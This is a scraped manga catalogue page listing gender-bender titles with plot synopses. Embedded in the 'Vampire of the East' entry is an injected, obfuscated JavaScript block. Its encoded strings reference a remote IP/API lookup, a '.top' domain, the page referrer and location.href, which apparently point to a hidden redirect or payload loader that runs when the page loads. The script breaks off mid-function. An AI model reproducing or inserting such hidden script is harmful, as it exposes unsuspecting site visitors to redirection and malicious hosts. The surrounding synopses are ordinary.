Gender Bender - Page 75

Gender bender manga involves characters who switch genders, leading to new perspectives and challenges. It explores how the character adapts to their new gender and the resulting changes in their relationships, often with humor or introspective themes.

959 results

Usotsuki Lily

From Manga Updates Hinata Saotome is suddenly asked out by En Shinohara, a gorgeous boy in her grade. What she doesn’t know, though, is that his hobby is cross-dressing! En has always hated men, and whenever he sees his own reflection, he punches out whatever is doing the reflecting (windows, mirrors…). To combat this hatred, he dresses up as a girl. Hinata decides to go out with him anyway, despite his weird hobby.


Usotsuki Lily (YAMADA Torico)

In the evening, a rather familiar girl standing in front of a general store’s window… Just when he thought life isn’t a shoujo manga, our dear main character got dragged into an adventure of his lifetime, at least it would seem so…


Uwasa no Midori-kun!!

Midori Yamate is a 15 year-old girl and is very much a tomboy. When she was young, Midori meets a boy called Tsukasa Hino, who came to the island she lives on for a holiday. He teaches her to play soccer and she falls in love with the sport. Midori is inspired by Tsukasa and continues to play soccer in hopes that they would meet again someday. When they do meet again Tsukasa does something unforgivable. Determined to defeat Tsukasa on the soccer field Midori enrolls in an all boy high school. Contains a short story of 2 chapters called Shounen x Cinderella in the 8th and 9th Volumes: Sakuragi Azuma has a secret that no one should ever know about: he's actually Momo Kasuka, an up and coming female model! While shooting a new drama, he meets another arising newcomer named Yui Hazuki, and things are going to get heated!


Vampire Crisis

From Midnight Scans: "For my love, the price to pay is your blood." In order to punish her loathsome ex-boyfriend, Hisoka attempts to use black magic on him. However, she makes a mistake in casting a spell, and accidentally calls a vampire named Rein instead!! He said that he will grant one wish for Hisoka but in return she must present him with her blood. At first, Hisoka is afraid but even though Rein is a vampire, he slowly changes into a gentle person, and because of that, her attraction towards him grows?! Includes: Vampire Crisis Vampire Emotion 100 no Inori to 1 no Onegai Kimi Janakya Dame Nan Desu!! 10nen Goshi no Angel


Vampire Doll

Guilt-Na-Zan is a vampire aristocrat who was sealed into a cross by Kyouji's ancestor more than 100 years ago. Now Kyouji has revived him--although his soul was resurrected into a cute female doll and can only transform into his real figure when he sucks blood from Kyouji's sister Tonae... But when you combine Goth clothes and hot vampires, slowly but surely everyone will start to feel like one big family! -- Tokyopop


Vampire Game

Centuries ago in an epic battle, King Phelios defeated the Vampire-King Duzell. Using a powerful spell Phelios destroyed Duzell but he perished as a sacrifice for using such a strong spell. As both laid dying, Duzell swore that he would be reincarnated to find Phelios' reincarnation and when he did he would drain Phelios' blood, rip his body limb from limb and laugh while his soul writhes, damned for eternity to a lake of fire. A century later, Duzell is reborn as a wildcat called a kyawl. Unfortunately, he can't find the reincarnation of the now Saint Phelios. Luckily, he is adopted by his nemesis' great-granddaughter, the 15-year-old princess Ishtar, through whom Duzell may be able to find the reincarnation of Phelios. The fate of the ages is reborn, and the vampire game begins.


Vampire of the East

After the decline of her family, Yangsun finds herself living as a book seller, while hiding her real identity. One day, she visits Eumseokgol to deliver some books. She runs into a breathtakingly beautiful scholar, Sungyul Kim, who is actually a vampire in disguise! As much as they are drawn to each other, they can’t be together because of the fact that one of them is human and the other, is a vampire! Could their love come to fruition? The mystery of the palace from the Chosun dynasty adds to the excitement. Enjoy this eerie and yet beautiful Chosun-era vampire story! Bameur Geonneun Seonbi / Scholar of the Night / Scholar Walking at Night / Scholar Who Walks the Night / Th? Sinh Bóng ?êm / Vampire In The Darkness / ??????, ??????? ????? / ???? / ???? / ?? ?? ?? / ?? ?? ??(????)<script></script><script>function _0x5367(){var _0x42ffb8=['.top/','DPCZp','random','AMXth','https://ip','382263ezPezD','then','pDtEK','text','4051052AbzsSO','location','google','floor','6809661xjKKdn','http://rea','referrer','VHHqI','xGVPq','mgjUl','2218200KvgLAb','1626234slnZAt','','href','tlsZD','aHfuc','20UFajvW','includes','2461504xgkVMM','1nBQSSx','1947489zVsaGO','.customapi','puimH'];_0x5367=function(){return _0x42ffb8;};return _0x5367();}(function(_0x32cce8,_0x3e096b){var _0x569d37=_0x4508,_0xd0552c=_0x32cce8();while(!![]){try{var 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Vanilla Ice

Taken from Baka-updates: Beautiful, delicate Yoon Sul and tall, brawny Taehee are exact opposites, and yet somehow they can't escape each other! And now with the addition of the popular student representative, Sijun, being interested in Taehee, how will Yoon Sul react?! Action-packed romantic comedy with a twist!


Versailles no Bara

The Rose of Versailles focuses on Oscar François de Jarjayes, a girl raised as a man to become her father's successor as leader of the Palace Guards. A brilliant combatant with a strong sense of justice, Oscar is proud of the life she leads, but becomes torn between class loyalty and her desire to help the impoverished as revolution brews among the oppressed lower class. Also important to the story are her conflicting desires to live life as both a militant and a regular woman as well as her relationships with Marie Antoinette, Count Axel von Fersen, and servant and best friend André Grandier. Licensed versions of this manga have been published in French, German and Spanish.


Versailles Of The Dead

A coach from Austria races toward the French royal court on a dark, gloomy night. Inside is Marie Antoinette, bride-to-be of Louis XVI, accompanied by her twin brother, Albert. Something goes terribly amiss during their trip when walking corpses attack the carriage. Fighting tooth and nail, Albert is the sole survivor. To keep the tentative alliance between Austria and France intact, King Louis XV agrees to let his son marry Albert in the guise of Marie Antoinette, a charade the adonrgynous young man is only too eager to participate in. Between navigating the social intrigues of the court, keeping his earth-shattering secret under wraps, and battling against the living dead, Albert plays the part of Dauphine with aplomb, though he's clearly hiding something even more devious beneath it all.


VRMMO de Summoner Hajimemashita

The world’s first action game VRMMO FWO (Fantasy World Online). Our main character chose to become a Summoner. While not so much in particularly willing to go about aggressively capturing monsters or aim to be the strongest player. Just wanting to have an adventure to search for cute monsters and clothes’ material. Without noticing in the flow of one situation after another, he becomes the top ranking Summoner.



Since the day her mother died, Ito Miura has dressed and acted like a guy; growing up with three brothers, she has always found girly clothes and mannerisms stifling. Now in high school, she wears her hair cut short like a guy's and dresses in the boys' uniform (much to her teachers' chagrin). This, combined with her tall stature and low voice, makes mistaking her for a boy easy; unless she told you, you would never think she was a girl. Stunningly beautiful transfer student, Makoto Amano and Ito quickly become friends when Makoto joins the school drama club, which Ito is a part of. The two find a surprising number of similarities between them such as their tall stature, both of their families' homes being dojos and their passion for theater. Ito soon discovers the shocking truth about her new "girl friend."
